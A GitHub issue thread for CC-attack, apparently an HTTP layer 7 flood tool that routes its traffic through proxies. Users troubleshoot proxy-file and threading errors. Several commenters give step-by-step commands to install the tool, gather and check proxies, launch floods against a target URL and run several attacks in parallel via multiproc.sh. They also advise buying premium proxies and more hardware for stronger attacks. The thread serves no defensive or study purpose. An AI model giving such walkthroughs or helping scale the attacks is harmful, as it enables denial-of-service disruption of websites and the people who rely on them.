### ISSUE TITLE
Proxies file not found

### ISSUE THREAD

**Issue by Autopowermta** [Leeon123/CC-attack#80]
Hi
Old version working fine when I was updated new version getting below error how to fix please help me
Proxies file not found

https://ibb.co/7X6bGK9

**Comment by Leeon123** [comment]
what is your command

**Comment by ThomasCFelix** [comment]
Use this command first to get proxies: python3 cc.py -url https://google.com -v 5 -down -check
Then use multiproc.sh for attack.

**Comment by Autopowermta** [comment]
Hi
python start.py bomb https://mywebsite.com 0 50 proxy.txt 100 3600

I tried like this no use

**Comment by Autopowermta** [comment]
python3 cc.py -url http://website.com -v 5 -s 60
python3 cc.py -url http://website.com -v 4 -s 60

I tried getting same error Proxies file not found

**Comment by Leeon123** [comment]
Did you download proxies

**Comment by Leeon123** [comment]
Please read it
https://github.com/Leeon123/CC-attack#usage

**Comment by Autopowermta** [comment]
C0d3d by L330n123
┌─────────────────────────────────────────────┐
│        Tos: Don't attack .gov website       │
├─────────────────────────────────────────────┤
│                 New stuff:                  │
│          [+] Added Http Proxy Support       │
│          [+] Optimization                   │
│          [+] Changed Varible Name           │
├─────────────────────────────────────────────┤
│ Link: https://github.com/Leeon123/CC-attack │
└─────────────────────────────────────────────┘
> Mode: [cc/post/head]
> Checking list
> Number Of Proxies: 1113
> Building threads...
Traceback (most recent call last):
  File "cc.py", line 707, in <module>
    main()#Coded by Leeon123
  File "cc.py", line 699, in main
    build_threads(mode,thread_num,event,proxy_type)
  File "cc.py", line 110, in build_threads
    th.start()
  File "/usr/lib64/python3.6/threading.py", line 846, in start
    _start_new_thread(self._bootstrap, ())
RuntimeError: can't start new thread

Getting this error please help me

**Comment by Leeon123** [comment]
Defualt attack time is 60 seconds

**Comment by Leeon123** [comment]
If you want to set it longer, use -s <time>

**Comment by gizliag** [comment]
hello @Leeon123  teacher I am trying your tools but I don't know what the command to run is can you explain in detail about adding proxy and starting the attack

**Comment by Leeon123** [comment]
@gizliag Is the usage not enough clear? What do you not understand? Please tell me

**Comment by gizliag** [comment]
> @gizliag Is the usage not enough clear? What do you not understand? Please tell me

Sir, I couldn't understand proxy transfer, then I did not understand how we can run these tools, so if you prepare a syntax, it will be easier. @Leeon123

**Comment by ThomasCFelix** [comment]
Enter the following commands in the linux terminal
1. pip3 install requests pysocks
2. git clone https://github.com/Leeon123/CC-attack.git
3. cd CC-attack
4. python3 cc.py -url https://google.com/ -v 5 -down -check -s 1
After receiving the proxies list with above command, you can use this command **python3 cc.py -url https://google.com/ -v 5** for sending attack.
If you want to send **multiple attacks at the same time**, do the following.
open multiproc.sh change **http://target.com** to your target website and change -v 4 to **-v 5**
atk_cmd="python3 cc.py -url **http://target.com** -v **5** -s 60"

**Comment by gizliag** [comment]
@ThomasCFelix 

Sir, first of all, thank you, I was able to do the attack, but I have only one question in mind 

https://camo.githubusercontent.com/edd974e1c4cd72a0db0639f1f5af56cc7cf3584b688575419d9e5692dc937c46/68747470733a2f2f692e696d677572e64370f667d

There are 200 thousand attacks on this link, but there are 100 attacks on mine, how can I do this? Do I need to use vds/vps?

**Comment by ThomasCFelix** [comment]
For layer 7 attacks, the Proxy list and CPU power are very important. If you want to send strong attacks, you should purchase premium proxies

**Comment by jkeridLNX3** [comment]
power depends on your hardware & connection

**Comment by jkeridLNX3** [comment]
i think thiis update more powerfull than before,i have both ..

if proxy not availbale just manual paste to cc-attack folder, leave a few hours,restart pc

**Comment by jkeridLNX3** [comment]
> python3 cc.py -url http://website.com -v 5 -s 60 python3 cc.py -url http://website.com -v 4 -s 60
> 
> I tried getting same error Proxies file not found
try this
python3 cc.py -url https://target.com -v 5  -down -check -t 800  -s 61

**Comment by jkeridLNX3** [comment]
> For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

give me link premium proxy

**Comment by ThomasCFelix** [comment]
> > For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies
> 
> give me link premium proxy

Do you have a telegram id?

**Comment by jkeridLNX3** [comment]
@parkos123

**Comment by sinaj2889** [comment]
> Use this command first to get proxies: python3 cc.py -url https://google.com -v 5 -down -check
> Then use multiproc.sh for attack.

You dont even need a target and v 5 ist default

**Comment by sinaj2889** [comment]
> Hi
> python start.py bomb https://mywebsite.com 0 50 proxy.txt 100 3600
> 
> I tried like this no use 

This wont work

**Comment by sinaj2889** [comment]
> Mode: [cc/post/head]
> > Checking list
> > Number Of Proxies: 343
> > Building threads...
> > Flooding...
> 
> after then quitting 

Default time is 60s you can chamgw it with -s (seconds) or edit default in cc.py
